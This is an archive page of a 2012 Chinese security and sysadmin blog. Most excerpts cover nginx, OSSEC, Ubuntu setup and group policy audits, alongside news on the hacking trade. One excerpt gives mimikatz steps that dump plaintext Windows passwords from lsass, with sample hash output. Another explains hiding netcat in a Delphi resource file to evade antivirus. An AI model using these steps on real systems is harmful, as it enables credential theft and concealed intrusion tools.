存档

2012年2月 的存档

Nginx设置目录浏览、以及登录权限认证

2012年2月28日 4 条评论

Nginx默认是不允许进行列目录的,如果需要使某个目录可以进行浏览,可如下设置:

如: 让/var/www/soft 这个目录在浏览器中完成列出.

一、设置目录浏览

1、打开/usr/local/nginx/conf/nginx.conf,找到WebServer配置处,加入以下内容:

location /soft/ {
root /var/www/;  此处为soft的上一级目录
autoindex on;
autoindex_exact_size off;
autoindex_localtime on;
}

2、保存退出,重启nginx服务即可。

阅读全文…

OSSEC之自定义脚本推送

2012年2月26日 5 条评论

OSSEC是一款开源的多平台的入侵检测系统,可以运行于Windows, Linux, OpenBSD/FreeBSD, 以及 MacOS等操作系统中。包括了日志分析,全面检测,rook-kit检测。

阅读官方文档,我们知道OSSEC有一个功能为Active-responses,有了这玩意,我们的OSSEC就不仅仅是简单的入侵检测系统了,你还可以让它DIY成一个远程管理平台。我们可以制定一些自定义脚本,通过OSSEC Server 端执行特定命令调用此脚本,对agent(客户端)进行脚本远程推送。这样, 当有时我们运维有大量Windows服务器时,我们只需在OSSEC服务器端执行命令就能批量对资产进行操作.

大概搜索了下,网上很少有这方面的文档,今天周末在家研究了下,记录一下,主要记录的是Windows客户端的配置说明,Linux客户端配置原理相同。

OSSEC_Server端及Agent端的安装过程就略过了,具体可上官方网站查看:http://www.ossec.net

首先来看OSSEC_Server端的配置过程,

1、打开/var/ossec/etc/ossec.conf

在<ossec_config> </ossec_config>之间加入以下脚本,

<command>
<name>update-script</name>
<executable>update-script.cmd</executable>
<expect></expect>
</command> 阅读全文…

Ubuntu 10.04安装Google输入法

2012年2月25日 4 条评论

系统又换回了个Ubuntu+XP,系统装好后,发现默认带的ibus输入法用起来相当不适应,Google了下SCIM+Google输入法的方法,记录之。(其实用ibus框架也可以)

此方法在Ubuntu 10.04通过.请自行测试,适应于已安装了SCIM框架。

1.安装SCIM-GooglePInyin所需要的组件:

autotools-dev,libgtk2.0-dev,libscim-dev,libtool, automake

一条命令就可以安装好上面的几个组件了:
aptitude install autotools-dev libgtk2.0-dev libscim-dev libtool automake
2.安装SCIM(已经有的可以跳过)
sudo apt-get install scim

3.安装GooglePInyin
sudo apt-get install git-core

git clone git://github.com/tchaikov/scim-googlepinyin.git

cd scim-googlepinyin
./autogen.sh
sudo make && suo make install

4.使用SCIM-GooglePInyin
系统-系统管理-语言支持-输入法,选择scim为默认.然后注销系统,重新登录后,ctrl+Space 就可以看到谷歌拼音了。

分类: 技术文档 标签: ,

获取Windows系统明文密码神器

2012年2月22日 3 条评论

今日在群看到某牛发一链接,老外所书某文,介绍使用此器获取系统明文密码的一些方法,具体如下:

注:使用前需确定自身系统是x86还是x64

本人测试环境:windows 2003

密码长度:8位

进入文件所在目录,双击打开mimikatz.exe,按照以下步骤进行,

1、mimikatz # privilege::debug

2、mimikatz # inject::process lsass.exe sekurlsa.dll

3、mimikatz # @getLogonPasswords

Authentification Id : 0;434898
Package d’authentification : NTLM
Utilisateur principal : User
Domaine d’authentification : vm-w7-ult
msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : fuck1234
tspkg : fuck1234 这里就是密码
我测试的时候还能看到历史密码。比较牛x的神器!

经网络众人分析,支持系统如下:

Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1 阅读全文…

分类: 安全工具 标签: ,

自动化组策略配置检查

2012年2月22日 11 条评论

最近公司做服务器安全检查,涉及到组策略配置的核查,如果一台一台进行手动查看,服务器过多的话会相当浪费时间,记得有命令可导出与组策略相关的安全数据库,于是百度之,分析了下组策略与其安全数据库的对应关系,整理此文,记录之。

简单说下方法,

首先通过命令,secedit /export /cfg model.inf  导出组策略配置信息,然后根据需要的Windows安全基线修改组策略,修改后再次用之前命令导出model2.inf,然后使用脚本过滤出不同部分,具体对应信息如下:

1.1 审核口令设置安全策略

密码必须符合复杂性要求 PasswordComplexity = 1
密码长度最小值 MinimumPasswordLength = 8
密码最长使用期限 MaximumPasswordAge = 42
密码最短使用期限 MinimumPasswordAge = 1
强制密码历史 PasswordHistorySize = 5
用可还原的加密来储存密码 ClearTextPassword = 0
复位帐户锁定计时器 ResetLockoutCount = 15
帐户锁定时间 LockoutDuration = 15
帐户锁定阈值 LockoutBadCount = 15

1.2 审核策略

审核策略更改:AuditPolicyChange = 3
审核登录事件:AuditLogonEvents = 3
审核对象访问:AuditObjectAccess = 3
审计过程跟踪:AuditPrivilegeUse = 0
审计目录服务访问:AuditProcessTracking = 0
审核特权使用:AuditDSAccess = 0
审核系统事件:AuditSystemEvents = 3
审核帐户登录事件:AuditAccountLogon = 3
审核帐户管理:AuditAccountManage = 3 阅读全文…

分类: 技术文档 标签: ,

Delphi资源文件释放

2012年2月21日 4 条评论

最近正好看到Delphi资源释放的一些方法,就记录下使用Brcc32 制作res资源文件来释放的方法吧。

以前Delphi做的一些常常也会用到此种方法,一般杀软不会检测到任何附加数据和2个文件头之类的现象,即使用到类似exescope可以看到资源中多了一个exefile,用加密软件也可以逃过,因此也达到一定免杀的作用。

 

一、步骤:

1.制作资源文件

1.1、在任意目录下新建一个文件,名为xx.rc,编辑内容为nc exefile nc.exe   //nc 为你的文件名,exefile为你的文件类型,nc.exe为你想要释放的资源文件。

1.2、将你想要释放的资源文件Copy到此目录,即nc.exe

1.3、打开命令行,转到xx.rc所在目录,执行命令 Brcc32 xx.rc,如果没有错误,目录会生成一个名为xx.res的文件。

2.制作Delphi程序

2.1、打开你的delphi程序,我这里用的Delphi7。

2.2、新建一个Console Application 工程,File-New-Other.  //新建Console Application的原因是为了减小最后生成的程序的体积。

2.3、将步骤1.3生成的xx.res复制到工程保存的地址,我这里保存在”E:\教程\DELPHI\源代码\2012\资源释放\”.

2.4、详见以下代码, 阅读全文…

一个黑产者的自白

2012年2月6日 10 条评论

  2011年末,网络上爆发了大规模的泄密事件,很多知名网络社区的账户被盗,引发了公众强烈的关注,一个上百亿元的黑客产业链随之浮出水面。而所谓黑产者,就是从事黑客产业链的人。《商界》记者几经周折,联系到一位匿身于网络背后的年轻黑产者,听一听他有着怎样的内心独白。

一个黑产者的自白

摘自:http://money.msn.com.cn/industry/20120206/16021362595.shtml

我是一个黑客,今年25岁。我的四个伙伴,年龄都在20岁左右,标准的90后。我们目前匿身于中国与缅甸的边境,原因很简单,逃避法律打击。

我们是在2008年从国内逃到缅甸的。当时,轰动江浙的“大小姐”病毒案东窗事发,十几个主犯当即被抓。我们几个伙伴被吓得不轻,连夜买火车票分头向外省逃跑,流窜数省之后,最终我们一起逃到缅甸,才算相对安全。现在想起跑路的情节,就像谍战大片一样惊险刺激。

对于我们来说,走上黑产之路,仿佛命中注定。

我们几个有着极为相似的成长背景:家庭环境一般,酷爱电脑技术,荒废学业。五六年前,我大学读了两年就辍学了,而其他四个90后高中就离开了校园。

最初我们只是单纯地对电脑技术感兴趣,后来通过一些网络论坛和报纸杂志,我们了解到了黑客技术,顿时觉得这个东西挺神奇的,黑客仿佛虚拟网络世界里无所不能的神。

现实世界的失意更加刺激了我们对虚拟世界的控制欲。在代码构成的虚拟世界里,有着另一套游戏规则,掌握了它也就可以掌握一切。

通过黑客技术论坛等渠道,我们学习了不少黑客技术。那时正是网络游戏兴起的时候,玩网络游戏的人越来越多,也越来越狂热,有不少人不惜花重金购买虚拟世界里的装备和金钱。有需求就会有供给,这个潜在需求巨大的市场,让我们的黑客技术有了发财的偏门,更催生了一个分工明确、环环相扣、资金规模巨大的黑客产业链!

首先是开发环节:精通技术的黑客们编写木马病毒程序,针对不同的网站或网络游戏的账户,开发不同款式的木马变种,然后按照类别卖给传播木马病毒的“包马人”。 阅读全文…

分类: 安全文摘 标签:

电商成黑客敛财新手段 90%电商用户数据外泄

2012年2月6日 3 条评论

摘自:http://www.hackbase.com/news/2012-02-06/111767.html

 

名 为钟道(化名)25岁,生活工作范围在北京近郊莘庄,也许他现在正在进行的交易与你有关,你在电子商务网站注册的手机号、邮箱等个人信息在他的手里几经交 易就可以转化为钞票,他就是电商企业用户数据泄漏的幕后黑手,他就是令电商企业愤怒无奈的元凶之一, 他就是网络黑客产业链中的“二道贩子”。

随着电子商务企业被业界公认为最近几年的“吸金王”,在获得眼球和关注的同时,也被一群叫“网络黑客”的“新生组织”盯上,并不定期“骚扰”索要“保护费”,每次索要金额百元到上千元不等。

 

受制于电商环境的大背景,一些电商企业由去年大手笔狠砸硬广(媒体上刊登的纯广告),转而寻求搜索引擎竞价排名的推广,却没想到这一举动竟惹上了黑客的关注。

电商成网络黑客攻击新目标

久久健康商城产品运营总监林大木向凤凰网科技透露,2012年与2011年电商大环境发生了很大改变,所以2011年底公司减少了硬广投放,加大了搜索引擎的竞价投放,比如百度、搜狗等,其金额相当于2011年的硬广投放金额,正是因为此举招来了黑客。

这是产业链的“黑幕”,他有些无奈的说,把这些都说出来,就意味着鱼死网破,但是我们实在忍无可忍了,不惜一战。

他 透露,网站自去年9月份直到2011年底,一共被攻击三次,每次攻击时间从一周到十几天不等,最后一次攻击持续了7天,直接导致机房瘫痪三天,网站无法访 问,直接经济损失达50万人民币,公司高层不得已决定连夜换机房。而其中值得一提的是,对方(网络黑客)开出的条件仅是索要1000块保护费。

谈及此次被攻击,林大木表示,每次攻击,DDOS流量都很大,公司的带宽完全无法承受,只能租用网宿科技的抗攻击的CDN服务,仅这一项花费每月要多十几万的支出。

“租用高额的机房毕竟不是我们这类中小电商可以长期负担的,我们一直在考虑用一种更好的方法解决,比如报案、寻求法律手段;委托中间人联系对方,但是均不奏效,对方就是吃定了我们没有办法对付他们。”他称。

90%电商中招大部分电商企业选择花钱保平安

业内人士认为,按照以往的惯例,具有一定规模和知名度的企业才是“网络黑客”的重点,一则是这些企业资金充沛,二则“保护费”金额不高,他们更愿意花钱了事,所以一些中小电商企业并无太大危险。

可是,现在这些黑客尝到了甜头,其触角所布之处有增无减,一些小电商也未能幸免,而久久健康商城就是其中的一家。

点击进入下一页

阅读全文…

分类: 安全文摘 标签:
普人特福的博客cnzz&51la for wordpress,cnzz for wordpress,51la for wordpress